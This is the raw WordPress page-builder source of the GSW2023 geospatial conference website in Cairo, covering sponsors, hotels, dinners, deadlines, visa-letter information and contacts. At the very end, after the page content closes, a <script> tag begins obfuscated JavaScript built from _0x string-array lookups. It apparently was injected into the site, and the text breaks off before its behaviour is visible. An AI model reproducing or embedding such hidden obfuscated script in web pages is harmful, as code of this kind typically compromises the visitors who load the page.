/></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951509602{margin-top: 50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951482477{margin-top: 80px !important;}\"]<img class=\"alignnone size-medium wp-image-4987 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 